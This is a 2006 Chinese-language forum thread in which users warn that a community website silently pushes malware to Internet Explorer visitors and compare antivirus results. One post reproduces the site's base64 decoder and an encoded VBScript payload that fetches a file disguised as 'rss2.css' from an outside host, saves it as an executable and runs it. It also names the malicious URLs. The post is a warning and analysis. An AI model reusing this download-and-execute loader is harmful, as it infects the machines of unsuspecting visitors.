[注意]數碼E社群網站發現病毒



贊助商連結


頁 : [1] 2

DarkSkyline
2006-11-10, 04:03 PM
FYI.
http://bbs.eztown.com.tw/

連上這個網站後,IE會自動下載"AdCount.com"檔案,"AntiVir PersonalEdition Premium" 11/10日病毒碼偵測到"HEUR/Crypted"病毒~

PS:請大家注意這個網站,沒事的話不要連結,以免中毒~

贊助商連結


proll
2006-11-10, 04:56 PM
用Firefox,進去沒有發現什麼

水蜜桃姐姐
2006-11-10, 05:10 PM
我家AntiVir PersonalEditi也有發現毒好恐怖

hn1271n
2006-11-10, 05:11 PM
用Firefox,進去沒有發現什麼

Firefox的核心和IE不同,所以無法利用IE漏洞進行非法下載病毒

基本上可能的話儘量不要使用IE上網

ㄚ一
2006-11-10, 05:32 PM
不喜歡用FF也可以安裝Gecko核心來瀏覽網頁

hcchen
2006-11-10, 08:41 PM
轉址到:


http://www.yyc8.com/script/adcount.do?id=ad002


利用JAVA檔案CODE.JS做加解密動作

CODE.JS內容:


var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var base64DecodeChars = new Array(
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1,
-1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1,
-1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1);

function base64(str,type)
{
if (type==0)
{
return base64encode(str)
}
else if(type==1)
{
return base64decode(str)
}
else
{
return str
}
}

function base64encode(str) {
var out, i, len;
var c1, c2, c3;

len = str.length;
i = 0;
out = "";
while(i < len) {
c1 = str.charCodeAt(i++) & 0xff;
if(i == len)
{
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt((c1 & 0x3) << 4);
out += "==";
break;
}
c2 = str.charCodeAt(i++);
if(i == len)
{
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt((c2 & 0xF) << 2);
out += "=";
break;
}
c3 = str.charCodeAt(i++);
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >>6));
out += base64EncodeChars.charAt(c3 & 0x3F);
}
return out;
}

function base64decode(str) {
var c1, c2, c3, c4;
var i, len, out;

len = str.length;
i = 0;
out = "";
while(i < len) {
/* c1 */
do {
c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
} while(i < len && c1 == -1);
if(c1 == -1)
break;

/* c2 */
do {
c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
} while(i < len && c2 == -1);
if(c2 == -1)
break;

out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

/* c3 */
do {
c3 = str.charCodeAt(i++) & 0xff;
if(c3 == 61)
return out;
c3 = base64DecodeChars[c3];
} while(i < len && c3 == -1);
if(c3 == -1)
break;

out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));

/* c4 */
do {
c4 = str.charCodeAt(i++) & 0xff;
if(c4 == 61)
return out;
c4 = base64DecodeChars[c4];
} while(i < len && c4 == -1);
if(c4 == -1)
break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
}
return out;
}

function utf16to8(str) {
var out, i, len, c;

out = "";
len = str.length;
for(i = 0; i < len; i++) {
c = str.charCodeAt(i);
if ((c >= 0x0001) && (c <= 0x007F)) {
out += str.charAt(i);
} else if (c > 0x07FF) {
out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
} else {
out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
}
}
return out;
}

function utf8to16(str) {
var out, i, len, c;
var char2, char3;

out = "";
len = str.length;
i = 0;
while(i < len) {
c = str.charCodeAt(i++);
switch(c >> 4)
{
case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
// 0xxxxxxx
out += str.charAt(i-1);
break;
case 12: case 13:
// 110x xxxx 10xx xxxx
char2 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
break;
case 14:
// 1110 xxxx 10xx xxxx 10xx xxxx
char2 = str.charCodeAt(i++);
char3 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x0F) << 12) |
((char2 & 0x3F) << 6) |
((char3 & 0x3F) << 0));
break;
}
}

return out;
}


function doit() {
var f = document.f
f.output.value = base64encode(utf16to8(f.source.value))
f.decode.value = utf8to16(base64decode(f.output.value))
}


function aa(str,n) {
var i, sa,sa1,l;
str = base64decode(str);
l = str.length
sa = str.substr(l-n,l);
sa1 = str.substr(0,l-n);
sa = sa+sa1;

return sa;
}


內容:


MiAgPSAiZDpCRDk2QzU1Ni02NUEzLTExRDAtOTgzQS0wMEMwNEZDMjlFMzYiDQogICAgWE1MMSA9ICJNaWMiDQogICAgWE1MMiA9ICJyb3NvZnQuWE1MSFRUUCINCiAgICBBZG9TcWExID0gIkFkb2RiLlMiDQogICAgQWRvU3FhMiA9ICJ0cmVhbSINCiAgICBvR2V0ICAgPSAiR0VUIg0KICAgIGZuYW1lMSA9ICJBZENvdW50LmNvbSINCiAgICBTRk8gICAgPSAiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiDQogICAgU0FwcCAgID0gIlNoZWxsLkFwcGxpY2F0aW9uIg0KICAgIGRsICAgICA9ICJodHRwOi8vd3d3Lnl5YzguY29tL3NjcmlwdC9zcmMvcnNzMi5jc3MiDQogICAgU2V0IGRmID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgib2JqZWN0IikNCiAgICBkZi5zZXRBdHRyaWJ1dGUgImNsYXNzaWQiLCBjbElEMSZjbElEMg0KICAgIFNldCB4ICA9ICBkZi5DcmVhdGVPYmplY3QoWE1MMSZYTUwyLCIiKQ0KICAgIHNldCBTICA9ICBkZi5jcmVhdGVvYmplY3QoQWRvU3FhMSZBZG9TcWEyLCIiKQ0KICAgIFMudHlwZSA9IDENCiAgICB4Lk9wZW4gb0dldCwgZGwsIEZhbHNlDQogICAgeC5TZW5kDQogICAgc2V0IEYgICA9IGRmLmNyZWF0ZW9iamVjdChTRk8sIiIpDQogICAgc2V0IHRtcCA9IEYuR2V0U3BlY2lhbEZvbGRlcigyKQ0KICAgIGZuYW1lMSAgPSBGLkJ1aWxkUGF0aCh0bXAsZm5hbWUxKQ0KICAgIFMub3Blbg0KICAgIFMud3JpdGUgeC5yZXNwb25zZUJvZHkNCiAgICBTLnNhdmV0b2ZpbGUgZm5hbWUxLDINCiAgICBTLmNsb3NlDQogICAgc2V0IFEgID0gZGYuY3JlYXRlb2JqZWN0KFNBcHAsIiIpDQogICAgUS5TaGVsbEV4ZWN1dGUgZm5hbWUxLCIiLCIiLCJvcGVuIiwwDQogICAgPC9zY3JpcHQ+DQogICAgPGhlYWQ+DQogICAgPHRpdGxlPkludGVybmV0IEV4cGxvcmVyPC90aXRsZT4NCiAgICA8L2hlYWQ+PGJvZHk+PC9ib2R5PjwvaHRtbD48aHRtbD4NCiA8c2NyaXB0IGxhbmd1YWdlPSJWQlNjcmlwdCI+DQogICAgb24gZXJyb3IgcmVzdW1lIG5leHQNCiAgICBjbElEMSAgPSAiY2xzaSINCiAgICBjbElE


下載檔案:
rss2.css(沒錯)

更改後檔名:
adcount.com


未發現其他現象...

esjustin
2006-11-10, 09:34 PM
剛用IE開,Kaspersky無法偵測:eye: ...

剛剛刪除暫存檔和所有紀錄檔...搜尋了一遍...沒找到rss2.css...

hcchen
2006-11-10, 09:44 PM
諾噸可以依這種行為攔截。
由於程式經過編碼加上下載檔案的名稱是.css
應該是躲過檢查的主因...........

sai7sai
2006-11-11, 12:02 AM
這個網站被植入 iframe 的語法(如下圖),好像尚未清除,真糟糕。
12353

hn1271n
2006-11-11, 11:13 AM
剛用IE開,Kaspersky無法偵測:eye: ...

剛剛刪除暫存檔和所有紀錄檔...搜尋了一遍...沒找到rss2.css...
也許是你已經打了安全補丁,所以惡意程式無法進行非法下載,用windows內建的搜尋看電腦裡有沒有惡意程式,如果沒有恭喜你躲過一劫